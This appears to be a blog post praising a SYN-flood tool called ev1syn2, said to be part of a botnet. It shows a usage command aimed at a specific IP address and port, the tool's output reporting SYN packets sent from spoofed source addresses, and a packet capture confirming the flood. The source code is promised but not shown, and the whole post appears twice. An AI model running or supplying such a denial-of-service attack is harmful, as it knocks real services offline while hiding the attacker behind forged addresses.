ev1syn2.c it's a a part of Int-Sec Botnet from my friend ev1lut10n
here is the source ev1syn2.c
sample usage:
# ./ev1syn2 77.78.103.36 80 80 2 2
[+] Delay Range Set to 2 second(s) and fork number set to 2 fork[s]
[+] New PID Set
[+] New PID Set
[+] New PID Set
[+] New PID Set
[+] Creating raw socket to attack 77.78.103.36 on port 80
[+] IP header set
[+] TCP header set
[+] Injected ip datagram
[+] Socket option set
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [83.85.162.151:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [121.249.252.241:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [233.19.20.82:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [31.142.81.45:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [167.39.87.8:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [130.82.208.212:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [74.153.27.117:80]
and the capture is correct now:
=========
No. Time Source Destination Protocol Info
18 10.831261 83.85.162.151 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 18 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 83.85.162.151 (83.85.162.151), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 0]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
19 11.831563 121.249.252.241 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 19 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 121.249.252.241 (121.249.252.241), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 1]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
20 11.831670 233.19.20.82 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 20 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 233.19.20.82 (233.19.20.82), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 2]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
21 11.831767 31.142.81.45 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 21 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 31.142.81.45 (31.142.81.45), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 3]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
22 11.859795 10.162.160.1 255.255.255.255 DHCP DHCP Offer - Transaction ID 0x5e8f01e6
Frame 22 (329 bytes on wire, 329 bytes captured)
Ethernet II, Src: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9), Dst: Broadcast (ff:ff:ff:ff:ff:ff)
Internet Protocol, Src: 10.162.160.1 (10.162.160.1), Dst: 255.255.255.255 (255.255.255.255)
User Datagram Protocol, Src Port: bootps (67), Dst Port: bootpc (68)
Bootstrap Protocol
No. Time Source Destination Protocol Info
23 12.832008 167.39.87.8 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 23 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 167.39.87.8 (167.39.87.8), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 4]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
24 12.832110 130.82.208.212 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 24 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 130.82.208.212 (130.82.208.212), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 5]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
Thanks to ev1 for this good tool
here is the source ev1syn2.c
sample usage:
# ./ev1syn2 77.78.103.36 80 80 2 2
[+] Delay Range Set to 2 second(s) and fork number set to 2 fork[s]
[+] New PID Set
[+] New PID Set
[+] New PID Set
[+] New PID Set
[+] Creating raw socket to attack 77.78.103.36 on port 80
[+] IP header set
[+] TCP header set
[+] Injected ip datagram
[+] Socket option set
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [83.85.162.151:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [121.249.252.241:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [233.19.20.82:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [31.142.81.45:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [167.39.87.8:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [130.82.208.212:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [74.153.27.117:80]
and the capture is correct now:
=========
No. Time Source Destination Protocol Info
18 10.831261 83.85.162.151 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 18 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 83.85.162.151 (83.85.162.151), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 0]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
19 11.831563 121.249.252.241 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 19 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 121.249.252.241 (121.249.252.241), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 1]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
20 11.831670 233.19.20.82 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 20 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 233.19.20.82 (233.19.20.82), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 2]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
21 11.831767 31.142.81.45 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 21 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 31.142.81.45 (31.142.81.45), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 3]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
22 11.859795 10.162.160.1 255.255.255.255 DHCP DHCP Offer - Transaction ID 0x5e8f01e6
Frame 22 (329 bytes on wire, 329 bytes captured)
Ethernet II, Src: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9), Dst: Broadcast (ff:ff:ff:ff:ff:ff)
Internet Protocol, Src: 10.162.160.1 (10.162.160.1), Dst: 255.255.255.255 (255.255.255.255)
User Datagram Protocol, Src Port: bootps (67), Dst Port: bootpc (68)
Bootstrap Protocol
No. Time Source Destination Protocol Info
23 12.832008 167.39.87.8 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 23 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 167.39.87.8 (167.39.87.8), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 4]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
24 12.832110 130.82.208.212 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 24 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 130.82.208.212 (130.82.208.212), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 5]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
Thanks to ev1 for this good tool
0 comments:
Post a Comment